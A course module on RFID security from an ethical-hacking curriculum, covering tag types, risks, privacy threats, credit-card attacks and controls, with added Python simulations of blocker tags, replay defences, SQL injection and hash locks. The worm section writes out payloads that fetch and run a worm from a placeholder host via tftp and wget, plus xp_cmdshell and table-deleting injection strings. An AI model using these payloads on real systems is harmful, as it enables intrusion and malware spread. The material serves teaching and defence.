CEHv6 Module 39: RFID Hacking
Ethical Hacking and Countermeasures, Version 6
Module XXXIX: RFID Hacking

News (source: http://www.theregister.co.uk/)
Module Objective

This module will familiarize you with:

- RFID
- Components of RFID systems
- RFID System Architecture
- RFID Collisions
- RFID Risks
- RFID and Privacy Issues
- RFID Security and Privacy Threats
- Vulnerabilities in RFID-enabled Credit Cards
- RFID Hacking Tool
- RFID Security Controls
Module Flow

RFID -> Components of RFID systems -> RFID System Architecture -> RFID Collisions -> RFID Risks -> RFID and Privacy Issues -> RFID Security and Privacy Threats -> Vulnerabilities in RFID-enabled Credit Cards -> RFID Hacking Tool -> RFID Security Controls

RFID

Radio Frequency Identification (RFID) is an automatic identification method.
It transmits the identity of an object, in the form of a unique serial number, using radio waves.
RFID systems work on the principle of contactless transfer of data between a data-carrying device (the tag) and its reader.
RFID (cont'd)

RFID tags contain at least two parts:

- An integrated circuit to store and process information, and to modulate and demodulate an RF signal
- An antenna for receiving and transmitting the signal
Components of RFID Systems

Basic components of an RFID system:

- Tags
- Tag readers
- RFID antenna
- RFID controller
- RFID premises server
- RFID integration server
General categories of RFID tags:

- Passive: requires no internal power source; the tag is powered entirely by the reader's field and answers by modulating (backscattering) that field
- Active: has its own internal power source (a small battery) and its own transmitter
- Semi-passive (battery-assisted): has a small battery that powers the chip, but still relies on the reader's field to communicate
RFID Collisions

RFID Tag Collision:

- Tag collision happens when multiple tags are energized by the reader simultaneously and reflect their respective signals back to the reader at the same time; the reader cannot decode any of them until it runs an anti-collision (singulation) procedure that addresses the tags one at a time

RFID Reader Collision:

- Reader collision occurs when the coverage area of one RFID reader overlaps with that of another reader
- This causes two different problems: signal interference, and multiple reads of the same tag
RFID Risks

- Business Process Risk
- Business Intelligence Risk
- Privacy Risk
- Externality Risk
  - Hazards of Electromagnetic Radiation
  - Computer Network Attacks
RFID Risks: Business Process Risk

Direct attacks on RFID system components could undermine the business processes the RFID system was designed to enable.
RFID systems are typically implemented to replace or enhance a paper-based or partially automated process, so organizations implementing them can become reliant on them.
Failure of any component or subsystem of the RFID system could result in system-wide failure.
Unlike most other risks, business process risk can result from both human action and natural causes.
If the network supporting the RFID system is down, the RFID system is likely to be down as well.
RFID Risks: Business Intelligence Risk

RFID supports wireless remote access to information about assets and people that previously did not exist or was difficult to create or to maintain dynamically.
A competitor or adversary can gain information from an RFID system in a number of ways:

- Eavesdropping on the RF link between readers and tags
- Performing independent queries on tags to obtain relevant data
- Obtaining unauthorized access to a back-end database that stores information about tagged items

Controls such as database access controls, password protection, and cryptography can significantly mitigate business intelligence risk if applied properly.

RFID Risks: Privacy Risk
Business objectives often conflict with privacy objectives.
Organizations can benefit from analysis and sharing of personal information obtained with RFID technology.
Privacy risk from the perspective of an organization implementing RFID might include:

- Penalties if the organization does not comply with privacy laws and regulations
- Customer avoidance or boycott of the organization because of real or perceived privacy concerns about RFID technology
- Being held legally liable for any consequences of weak privacy protections
- Employees, shareholders, and other stakeholders disassociating from the organization due to concerns about corporate social responsibility
RFID Risks: Privacy Risk (cont'd)

Other factors that impact the level of privacy risk include:

- Whether personal information is stored on tags
- Whether tagged items are considered personal
- Length of time records are retained in analytic or archival systems
- Effectiveness of RFID security controls, in particular tag memory access control and authentication mechanisms
- Ability of tags to be disabled after their use in a business process
- Ability of users to effectively shield tags to prevent unauthorized read transactions
- The likelihood that the tag will be in proximity to compatible readers

RFID Risks: Externality Risk

RFID systems typically are not isolated from other systems and assets in the enterprise.
Externality risks can exploit both the RF and enterprise subsystems of an RFID system:
- The major externality risk for the RF subsystem is hazards resulting from electromagnetic radiation
- The major externality risk for the enterprise subsystem is computer network attacks on networked devices and applications

Because externality risk by definition involves risks outside the RFID system, it is distinct from both business process risk and business intelligence risk.
RFID and Privacy Issues

Any organization contemplating the use of RFID should first ensure that it is aware of its privacy obligations under the applicable laws before it starts accumulating data.

RFID attacks used to bypass personal privacy are:

- Placing RFID tags hidden from view and using them for stealth tracking
- Using the unique identifiers provided by RFID for profiling and for identifying consumer patterns and behavior
- Using hidden readers for stealth tracking and collecting personal information
Countermeasures

Methods used to avoid RFID privacy attacks:

RSA Blocker Tags:

- A blocker tag helps maintain consumer privacy by answering every query from a reader that attempts to scan tags without authorization: it simulates the full range of possible tag serial numbers in its protected zone, so the reader's anti-collision procedure never finishes and the real tags near it cannot be singulated

Kill Switches:

- Newer RFID tags ship with a kill command that allows the tag to be permanently disabled, for example at the point of sale; the command is protected by a kill password, and a default or guessable kill password lets an attacker use the same command as a denial-of-service attack
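How a reader resolves the tag collisions described earlier by binary tree walking, and how the RSA blocker tag above exploits exactly that procedure, as an added Python example; this is not code from the module or from RSA. It assumes 8-bit IDs (instead of the 96-bit EPCs used in practice), a reader that broadcasts ID prefixes, and tags that answer with their next ID bit; the three-tag inventory is constructed.

```python
"""Binary tree-walking singulation, and how a blocker tag defeats it.

Added example, not from the module: IDs are shortened to 8 bits so the whole
tree fits in a test, and the tags and reader below are simulations.
"""
from __future__ import annotations

ID_BITS = 8  # assumption: 8-bit IDs instead of the 96-bit EPCs used in practice


class Tag:
    """An ordinary tag: if the reader's prefix matches its ID, it answers with the next bit."""

    def __init__(self, tag_id: int) -> None:
        self.bits = format(tag_id, f"0{ID_BITS}b")

    def respond(self, prefix: str) -> set[str]:
        if len(prefix) < ID_BITS and self.bits.startswith(prefix):
            return {self.bits[len(prefix)]}
        return set()  # silent: not in this subtree


class BlockerTag:
    """Blocker tag (the RSA scheme by Juels, Rivest and Szydlo): pretends that every
    ID under its privacy-zone prefix exists, so every query inside the zone collides."""

    def __init__(self, zone: str = "") -> None:
        self.zone = zone  # "" blocks the whole ID space; "1" blocks IDs starting with 1

    def respond(self, prefix: str) -> set[str]:
        if len(prefix) >= ID_BITS:
            return set()
        if len(prefix) < len(self.zone):  # reader is still above the zone: steer it in
            return {self.zone[len(prefix)]} if self.zone.startswith(prefix) else set()
        return {"0", "1"} if prefix.startswith(self.zone) else set()


def singulate(tags: list, max_queries: int = 10_000) -> tuple[list[str], int, bool]:
    """Reader side of tree walking: depth-first search over ID prefixes.

    The reader broadcasts a prefix; tags in that subtree answer with their next bit.
    Seeing both bits at once is a collision, resolved by descending into both
    subtrees. Returns (singulated IDs, queries sent, aborted by query budget).
    """
    stack = [""]
    found: list[str] = []
    queries = 0
    while stack:
        prefix = stack.pop()
        if len(prefix) == ID_BITS:
            found.append(prefix)  # leaf reached: one tag (or one phantom) singulated
            continue
        if queries >= max_queries:
            return found, queries, True
        queries += 1
        answers: set[str] = set()
        for tag in tags:
            answers |= tag.respond(prefix)
        for bit in sorted(answers, reverse=True):  # push "1" first so "0" is walked first
            stack.append(prefix + bit)
    return found, queries, False


# Constructed inventory: three real tags, one of them (0xC5) in the "1" half of the ID space.
REAL_TAGS = [Tag(0x0A), Tag(0x3C), Tag(0xC5)]


def demo() -> dict:
    ids, queries, _ = singulate(REAL_TAGS)
    # Blocker protecting the "1" zone: the reader still reads the "0" half normally,
    # but under "1" it sees a collision at every node and walks all 2**7 phantom IDs.
    blocked_ids, blocked_queries, _ = singulate(REAL_TAGS + [BlockerTag("1")])
    # With a realistic query budget the reader gives up before finishing the zone.
    _, _, budget_aborted = singulate(REAL_TAGS + [BlockerTag("1")], max_queries=50)
    return {
        "plain_ids": sorted(ids),
        "plain_queries": queries,
        "blocked_zone0": sorted(i for i in blocked_ids if i.startswith("0")),
        "blocked_zone1_count": sum(i.startswith("1") for i in blocked_ids),
        "blocked_queries": blocked_queries,
        "budget_aborted": budget_aborted,
    }


if __name__ == "__main__":
    print(demo())
```

With 8-bit IDs the blocker only inflates the walk from 20 queries to 140; with 96-bit EPCs the protected subtree has 2^95 leaves, which is why the reader has to give up. The same walk also shows why the forward channel matters for sniffing: every prefix the reader broadcasts is a piece of a real tag's ID, readable at far greater range than the tag's own reply.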
RFID Security and Privacy Threats

- Sniffing
- Tracking
- Spoofing
- Replay attacks
- Denial-of-service
Sniffing

RFID tags are designed to be readable by any compliant reader.
It is easy to collect RFID data by eavesdropping on the wireless RFID channel.
Unrestricted access to tag data can have serious implications: collected tag data might reveal information such as medical predispositions or unusual personal inclinations, causing denial of insurance coverage or employment for an individual.

Tracking
RFID technology facilitates secret monitoring of an individual's location and actions.
RFID readers placed in strategic locations can record an RFID tag's unique responses, which can then be persistently associated with a person's identity.
Even tags without unique identifiers facilitate tracking by forming "constellations": recurring groups of tags that are associated with an individual.

Spoofing
Attackers can mimic authentic RFID tags by writing appropriately formatted data on blank RFID tags.
Tag cloning is another kind of spoofing attack, which produces unauthorized copies of legitimate RFID tags.
Researchers from Johns Hopkins University cloned a cryptographically protected Texas Instruments Digital Signature Transponder.
Replay Attacks

RFID relay devices can intercept and retransmit RFID queries, which offenders can use to abuse various RFID applications.
England's RFID-enabled license plates (e-Plates) are an example of a modern RFID system that is susceptible to attack by a relay device.
Active e-Plate tags contain an encrypted ID code that is stored in the UK Ministry of Transport's vehicle database.
An attacker can record the encrypted identifier when another car's license plate is scanned and replay it later; encrypting a static identifier does not prevent this, because the reader accepts the same ciphertext every time.
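The replay against a static (even encrypted) identifier described above, beside a reader-chosen challenge that defeats it, as an added Python example. It is not from the module and does not model the real e-Plate protocol: the transponders are models, and the 4-byte IDs, 16-byte challenges, HMAC-SHA256 and the per-tag key are assumptions made for the example.

```python
"""Replaying a recorded transponder response, and why a reader-chosen challenge stops it.

Added example, not from the module. The transponders below are models; the ID
length, challenge length, MAC and keys are assumptions.
"""
from __future__ import annotations

import hashlib
import hmac
import os
from typing import Callable

ID_LEN = 4  # bytes of identifier at the front of a keyed response (assumption)


class StaticTransponder:
    """Tag whose answer never changes: an encrypted but fixed identifier is still fixed."""

    def __init__(self, blob: bytes) -> None:
        self.blob = blob

    def respond(self, challenge: bytes) -> bytes:
        return self.blob


class KeyedTransponder:
    """Tag with a per-tag secret; its answer is bound to the reader's challenge."""

    def __init__(self, tag_id: bytes, key: bytes) -> None:
        self.tag_id, self.key = tag_id, key

    def respond(self, challenge: bytes) -> bytes:
        mac = hmac.new(self.key, challenge + self.tag_id, hashlib.sha256).digest()
        return self.tag_id + mac


class ReplayDevice:
    """Attacker's recorder: sniffs one exchange, then answers any reader with the recording."""

    def __init__(self) -> None:
        self.recording = b""

    def sniff(self, tag, challenge: bytes) -> None:
        self.recording = tag.respond(challenge)  # observed over the air

    def respond(self, challenge: bytes) -> bytes:
        return self.recording


class Reader:
    def __init__(self, keys: dict[bytes, bytes], known_blobs: set[bytes],
                 nonce: Callable[[], bytes] = lambda: os.urandom(16)) -> None:
        self.keys, self.known_blobs, self.nonce = keys, known_blobs, nonce

    def accept_static(self, tag) -> bool:
        """Static-ID check: anything that reproduces a blob in the database is accepted."""
        return tag.respond(b"") in self.known_blobs

    def accept_challenge_response(self, tag) -> bool:
        """Fresh challenge per read; the MAC must bind this challenge and the tag's key."""
        challenge = self.nonce()
        response = tag.respond(challenge)
        tag_id, mac = response[:ID_LEN], response[ID_LEN:]
        key = self.keys.get(tag_id)
        if key is None:
            return False
        expected = hmac.new(key, challenge + tag_id, hashlib.sha256).digest()
        return hmac.compare_digest(mac, expected)


def scenario() -> dict[str, bool]:
    key = bytes(range(32))                               # constructed per-tag secret
    car = KeyedTransponder(b"CAR1", key)
    plate = StaticTransponder(b"encrypted-plate-id")     # constructed 'encrypted' static ID
    reader = Reader({b"CAR1": key}, {plate.blob})
    weak_reader = Reader({b"CAR1": key}, {plate.blob}, nonce=lambda: b"\x00" * 16)  # broken RNG
    attacker = ReplayDevice()

    # 1. Static identifier: record once, replay forever.
    attacker.sniff(plate, b"")
    static_replay_accepted = reader.accept_static(attacker)

    # 2. Challenge-response: the recording answers an old challenge, not the new one.
    attacker.sniff(car, os.urandom(16))
    fresh_replay_accepted = reader.accept_challenge_response(attacker)

    # 3. Same protocol, but the reader's 'nonce' repeats: replay works again.
    attacker.sniff(car, b"\x00" * 16)
    weak_nonce_replay_accepted = weak_reader.accept_challenge_response(attacker)

    return {
        "genuine_tag_accepted": reader.accept_challenge_response(car),
        "static_replay_accepted": static_replay_accepted,
        "fresh_replay_accepted": fresh_replay_accepted,
        "weak_nonce_replay_accepted": weak_nonce_replay_accepted,
    }


if __name__ == "__main__":
    print(scenario())
```

Note the module's own distinction between replay and relay: a fresh challenge stops replay of a recording, but not a relay device that forwards the live challenge to the real tag and its answer back in real time; only the latency the protocol tolerates limits that attack.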
Denial-of-service

Thieves can exploit RFID tags and back-end databases to steal RFID-tagged items by removing the tags from the items completely, or by putting the items in a foil-lined "booster bag" that blocks the reader's query signals and temporarily deactivates the items.
Another attack takes the opposite approach: flooding an RFID system with more data than it can handle.
An attacker can also remove RFID tags and plant them on other items, causing RFID systems to record useless data, discrediting and devaluing the RFID technology.
Protection against RFID Attacks

Cryptography:

- Minimalist cryptography
- Human-computer authentication
- Hash locks

Detection and evasion:

- RFID Detektor (http://tinyurl.com/)
- Data Privatizer (https://shop.foebud.org/)
- RFID Guardian (www.rfidguardian.org)

Temporary Deactivation:

- Consumers can deactivate their RFID tags to avoid most modern-day threats

Other techniques:

- Periodic modification of the RFID tag identifiers' appearance and data
RFID Guardian

RFID Guardian is a mobile, battery-powered device that offers personal RFID security and privacy management.
It monitors and regulates RFID usage on behalf of its owner: it is meant for personal use and manages the RFID tags within physical proximity of a person.
It acts like an RFID reader, querying tags and decoding the tag responses, and it can also emulate an RFID tag, allowing it to perform direct in-band communication with other RFID readers.
RFID Guardian integrates four separate security properties into a single device:

- Auditing
- Key management
- Access control
- Authentication
RFID Malware

RFID malware is transmitted and executed via an RFID tag:

- Threats arise when criminals cause valid RFID tags to behave in unexpected ways
- If certain vulnerabilities exist in the RFID software, an RFID tag can be infected with a virus
- When an unsuspecting reader scans an infected tag, there is a danger of the tag exploiting a vulnerability

Classes of RFID Malware:

- RFID Exploit: malicious RFID tag data that exploits some vulnerability of the RFID system
- RFID Worm: an RFID-based exploit that abuses a network connection to achieve self-replication
- RFID Virus: an RFID-based exploit that autonomously self-replicates its code to new RFID tags, without requiring a network connection
How to Write an RFID Virus

A virus performs two types of functions: it replicates itself using the database and, optionally, it executes a payload.
Broadly, there are two types of virus replication:

Replication Using Self-Referential Queries:

- Database systems usually offer a way to obtain the currently running queries for system administration purposes; the virus reads its own query text through this interface and writes it back into the data that will be copied onto tags
- There are two versions of this virus: one contains a single query and the other contains multiple queries
- The single-query virus requires fewer features from the database, but cannot carry SQL code as a payload
- The multiple-query version requires a database that supports multiple (stacked) queries per request, and can carry SQL code as a payload

Replication Using Quines:

- A quine is a program that prints its own source code
- The virus copies its own source code into the database, from where it is later copied onto tags
- Quines require multiple queries, which means they are not supported on all databases
- They allow SQL code to be executed as a payload
How to Write an RFID Worm

A worm is a program that self-propagates across a network, exploiting security flaws in widely used services.
An RFID worm propagates by exploiting security flaws in online RFID services.
RFID worms do not require users to do anything to propagate, although they can also spread via RFID tags if given the opportunity.

Propagation:

- RFID tags are too small to carry an entire worm
- The tag contains only enough of the worm to download the rest from a computer connected to the Internet

How to Write an RFID Worm (cont'd)

The RFID tag can include either binary code to download and execute the worm, or shell commands.

Example 1 - Executing shell commands using SQL Server:

    Apples'; EXEC Master..xp_cmdshell 'shell commands';

Example 2 - Downloading and executing a worm on Windows:

    cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe

Example 3 - Downloading and executing a worm on Linux using SSI:

    <!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm"-->

Defending Against RFID Malware

Lock down RFID user accounts and database accounts.
Disable or remove any features that are not required.
To avoid SQL injection:
- Any data that is copied into a SQL statement should be checked and escaped using the functions provided by the database API
- Better still, do not copy data into SQL statements at all: use prepared statements and parameter binding

Client-side scripting can be prevented by properly escaping data inserted into HTML pages.
Buffer overflows can be prevented by properly checking buffer bounds.
RFID Exploits

SQL Injection:

- If the RFID middleware does not process the data read from the tag correctly, it is possible to exploit the database by executing SQL code that is stored on the tag

Client-side Scripting:

- Exploiting the dynamic features offered by modern browsers by including JavaScript code on the tag, which runs when the tag data is displayed in a web-based management interface

Buffer Overflow:

- Exploiting the limited memory of the RFID tag: the tag returns more data than the reader expects, causing the buffer in the reader or middleware to overflow

(Figure: The World's First RFID Chip Infected with a Virus)
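The SQL injection exploit described in these slides and the prepared-statement defense from the previous slide, as an added Python/SQLite example that is not the module's code: the same middleware written twice, once pasting tag memory into the statement text and once binding it as a parameter. The schema, the middleware functions and the tag payloads are constructed; SQLite's executescript() stands in for a database that runs stacked queries, such as the SQL Server example earlier in the module.

```python
"""Tag data copied into SQL: the injection the module describes, beside the
prepared-statement fix it recommends.

Added example, not the module's or any product's code. Schema, middleware and
tag payloads are constructed; executescript() models stacked-query support.
"""
import re
import sqlite3

EPC_PATTERN = re.compile(r"^[0-9A-F]{8,24}$")  # assumption: tags carry a hex EPC only

# Constructed tag memory contents
GOOD_TAG = "E2000001"
DUMP_ALL_TAG = "' OR '1'='1"                                  # turns a lookup into a dump
STACKED_TAG = "E2000001', 'rogue'); DELETE FROM items; --"    # closes the INSERT, appends a statement


def setup() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items(epc TEXT PRIMARY KEY, description TEXT);
        CREATE TABLE scans(epc TEXT, reader TEXT);
        INSERT INTO items VALUES ('E2000001', 'pallet of apples');
        INSERT INTO items VALUES ('E2000002', 'pallet of pears');
    """)
    return db


# --- vulnerable middleware: tag data is pasted into the statement text ---------------

def lookup_vulnerable(db, tag_data: str) -> list:
    return db.execute(f"SELECT epc, description FROM items WHERE epc = '{tag_data}'").fetchall()


def log_scan_vulnerable(db, tag_data: str, reader: str) -> None:
    # executescript() runs every statement in the string, so a tag can append its own
    db.executescript(f"INSERT INTO scans VALUES ('{tag_data}', '{reader}');")


# --- hardened middleware: parameter binding, plus a whitelist check as defense in depth --

def is_plausible_epc(tag_data: str) -> bool:
    return EPC_PATTERN.match(tag_data) is not None


def lookup_safe(db, tag_data: str) -> list:
    # The bound value is never parsed as SQL; the injection string simply matches no row
    return db.execute("SELECT epc, description FROM items WHERE epc = ?", (tag_data,)).fetchall()


def log_scan_safe(db, tag_data: str, reader: str) -> None:
    db.execute("INSERT INTO scans VALUES (?, ?)", (tag_data, reader))
    db.commit()


def count_rows(db, table: str) -> int:
    assert table in ("items", "scans")  # table name is program-controlled, not tag data
    return db.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]


def demo() -> dict:
    db = setup()
    out = {
        "honest_lookup": lookup_safe(db, GOOD_TAG),
        "vulnerable_dump_rows": len(lookup_vulnerable(db, DUMP_ALL_TAG)),
        "safe_dump_rows": len(lookup_safe(db, DUMP_ALL_TAG)),
        "stacked_payload_passes_whitelist": is_plausible_epc(STACKED_TAG),
    }
    log_scan_safe(db, STACKED_TAG, "dock-1")
    out["items_after_safe_log"] = count_rows(db, "items")
    out["stacked_payload_stored_verbatim"] = db.execute(
        "SELECT COUNT(*) FROM scans WHERE epc = ?", (STACKED_TAG,)).fetchone()[0] == 1
    log_scan_vulnerable(db, STACKED_TAG, "dock-1")
    out["items_after_vulnerable_log"] = count_rows(db, "items")
    return out


if __name__ == "__main__":
    print(demo())
```

Parameter binding is the fix; the whitelist check is defense in depth and also the only line here that would stop the JavaScript or oversize payloads listed on this slide, which binding alone does not address.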
Vulnerabilities in RFID-enabled Credit Cards

Tracking Attack:

- In this attack, a legitimate merchant exceeds the expected use of his/her RFID credit card readers, for example by reading the cards carried by customers who are not paying in order to track them

Eavesdropping Attack:

- In an eavesdropping attack, an adversary uses an antenna to record the communication between a legitimate RF device and a reader
- As eavesdropping happens on a live communication, foil shielding does not help to prevent this particular attack: the card is out of its shield while it is being used
- Eavesdropping feasibility depends on many factors, including read distance
Vulnerabilities in RFID-enabled Credit Cards (cont'd)

Skimming Attack:

- In this attack, an unauthorized and potentially clandestine reader reads tags from close proximity or from a distance
- The "Johnny Carson" attack on RFID credit cards occurs when an attacker with access to the physical mail stream reads RF data from credit cards in transit to their owners, through the envelope
- This attack is particularly powerful because the adversary also gains accessory knowledge such as the cardholder's address
- A compromised reader at a parking garage could skim a customer's credit-card information at the same time that it reads the parking pass
- Fob-type RFID credit cards are now available for attachment to key rings, exposing them to attack when consumers leave their keys unattended
- This behavior is seen most often in valet-parking situations, or in gymnasiums where it is common for users to leave their keys together in an unsecured box by the door
Vulnerabilities in RFID-enabled Credit Cards (cont'd)

Replay and Relay Attack:

- In a replay attack, an attacker broadcasts an exact replay of the transponder end of the radio signal recorded from a past transaction between an RF device and a reader
- The relay attack uses a man-in-the-middle to relay a transient connection from a legitimate reader, through one or more adversarial devices, to a legitimate tag which may be at a considerable distance
- The distance at which the relay attack can succeed is limited only by the latency that the attacked protocol will tolerate

Cross-contamination Attack:

- The cross-contamination attack occurs when private information such as the cardholder name, card number, and expiration date learned by an attacker in an RF context is then used by the attacker in a different context
- The attacker can use this data to create a magstripe card, re-encode the stripe on an existing card, or use the data in a 'card-not-present' transaction such as a telephone or online mail-order purchase
RFID Hacking Tool

RFDump

RFDump is a tool that allows you to read RFID tags within range, and to change and alter all the data stored in the RFID tag.
RFDump is a back-end GPL tool that interoperates directly with any RFID ISO reader to make the contents stored on RFID tags accessible.
The user data can be displayed and modified using either a hex or an ASCII editor.
RFDump works with the ACG multi-tag reader or similar card reader hardware.
RFDump: Screenshot 1

RFDump: Screenshot 2

RFID Security Controls
Management Controls

A management control involves oversight of the security of the RFID system.
The management of an organization might need to update existing policies to address RFID implementations.
Management controls are typically involved in risk assessment, system planning, and system acquisition, as well as security certifications, accreditations, and assessments.

The management controls for RFID systems:

- RFID Usage Policy
- IT Security Policies
- Agreements with External Organizations
- Minimizing Sensitive Data Stored on Tags
Operational Controls

An operational control involves the actions performed on a daily basis by the system's administrators and users.
There are several types of operational controls:

- Physical access controls restrict access to authorized personnel where the RFID systems are deployed
- Proper placement of RF equipment helps to avoid interference and reduce hazards from electromagnetic radiation
- Organizations can destroy tags after they are no longer useful, to prevent adversaries from gaining access to their data
- Operator training ensures that personnel using the system follow appropriate guidelines and policies
- Information labels and notices can inform users of the intended purposes of the RFID system and of simple methods users can employ to mitigate risk
Technical Controls

A technical control uses technology to monitor or restrict the actions that can be performed within the system.
Some technical controls are specified in the standards, while others are available only in proprietary systems.
Many technical controls related to a tag require the tag to perform additional computations and to have additional volatile memory.
Technical controls exist for all components of RFID systems, including the RF, enterprise, and inter-enterprise subsystems.

The general types of RF subsystem controls include controls to:

- Provide authentication and integrity services to RFID components and transactions
- Protect RF communication between reader and tag
- Protect the data stored on tags
RFID Security

- Tags can be set to have a security bit turned on in a reserved memory block on the tag
- Random transaction IDs should be present on rewritable tags
- Improved passwords via persistent state
- Mutual authentication of tag and reader, with privacy for the tag:
  - PRF Private Authentication Scheme
  - Tree-Based Private Authentication
  - A Two-Phase Tree Scheme
- Security to protect the read/write options:
  - Password protected
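The hash locks listed under cryptographic protections earlier in the module and the "privacy for the tag" item above, as an added Python example that is not the module's code: a static hash lock beside a randomized hash lock, with the back end's linear-time identification that the tree-based schemes listed above are designed to avoid. The hash function, ID format, key derivation and the 500-tag inventory are constructed for the example.

```python
"""Hash locks for tag privacy: the static hash lock beside the randomized one.

Added example, not from the module. It models the hash-lock schemes with
SHA-256; tag IDs, keys and the back-end inventory are constructed.
"""
from __future__ import annotations

import hashlib
import hmac
import os


def h(*parts: bytes) -> bytes:
    """One-way hash over a length-delimited concatenation (stand-in for the tag's hash)."""
    return hashlib.sha256(b"".join(len(p).to_bytes(2, "big") + p for p in parts)).digest()


class HashLockTag:
    """Static hash lock: the tag only ever emits metaID = H(key) until the owner
    sends the key, so the real ID is never broadcast unlocked. Weakness: metaID
    is constant, so the tag is still trackable."""

    def __init__(self, tag_id: bytes, key: bytes) -> None:
        self.tag_id, self.meta_id = tag_id, h(key)

    def query(self) -> bytes:
        return self.meta_id

    def unlock(self, key: bytes) -> bytes | None:
        return self.tag_id if hmac.compare_digest(h(key), self.meta_id) else None


class RandomizedHashLockTag:
    """Randomized hash lock: every query gets (r, H(ID, r)) with a fresh r, so
    two reads of the same tag are unlinkable without knowing the ID."""

    def __init__(self, tag_id: bytes) -> None:
        self.tag_id = tag_id

    def query(self) -> tuple[bytes, bytes]:
        r = os.urandom(16)
        return r, h(self.tag_id, r)


class BackEnd:
    """Authorized reader plus back end: knows every enrolled ID and key."""

    def __init__(self, tags: dict[bytes, bytes]) -> None:
        self.key_by_meta = {h(key): key for key in tags.values()}
        self.known_ids = list(tags)

    def open_static(self, tag: HashLockTag) -> bytes | None:
        key = self.key_by_meta.get(tag.query())
        return tag.unlock(key) if key is not None else None

    def identify_randomized(self, r: bytes, digest: bytes) -> tuple[bytes | None, int]:
        """Linear scan: one hash per enrolled ID per read. This O(n) cost is what
        the tree-based private authentication schemes reduce to O(log n)."""
        tried = 0
        for tid in self.known_ids:
            tried += 1
            if hmac.compare_digest(h(tid, r), digest):
                return tid, tried
        return None, tried


def demo() -> dict:
    # Constructed inventory of 500 tags with per-tag keys derived from a master key.
    inventory = {f"TAG-{i:04d}".encode(): h(b"master-key", str(i).encode()) for i in range(500)}
    back_end = BackEnd(inventory)

    static = HashLockTag(b"TAG-0001", inventory[b"TAG-0001"])
    randomized = RandomizedHashLockTag(b"TAG-0499")       # enrolled last: worst case for the scan
    r1, d1 = randomized.query()
    _, d2 = randomized.query()
    tid, tried = back_end.identify_randomized(r1, d1)
    stranger, tried_all = back_end.identify_randomized(*RandomizedHashLockTag(b"NOT-ENROLLED").query())
    return {
        "static_reads_linkable": static.query() == static.query(),
        "static_opened_by_back_end": back_end.open_static(static),
        "static_opened_with_wrong_key": static.unlock(b"guess"),
        "randomized_reads_linkable": d1 == d2,
        "randomized_identified": tid,
        "hashes_per_read": tried,
        "unknown_tag": stranger,
        "hashes_for_unknown": tried_all,
    }


if __name__ == "__main__":
    print(demo())
```

The randomized hash lock gives unlinkability, not authentication: a recorded (r, H(ID, r)) pair can be replayed to the back end and will identify as that tag, so the mutual-authentication schemes listed above additionally need a reader-supplied challenge and a check in the reader-to-tag direction.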
Summary

- Radio Frequency Identification (RFID) is an automatic identification method
- An RFID tag is an electronic device that holds data
- An RFID reader is a device used to interrogate an RFID tag
- RFID stations can read and update the information stored on the RFID tag
- RFID standards define the air interface protocol, data content, conformance, and applications
- The protective measures against RFID attacks are cryptography, detection and evasion, temporary deactivation, and other techniques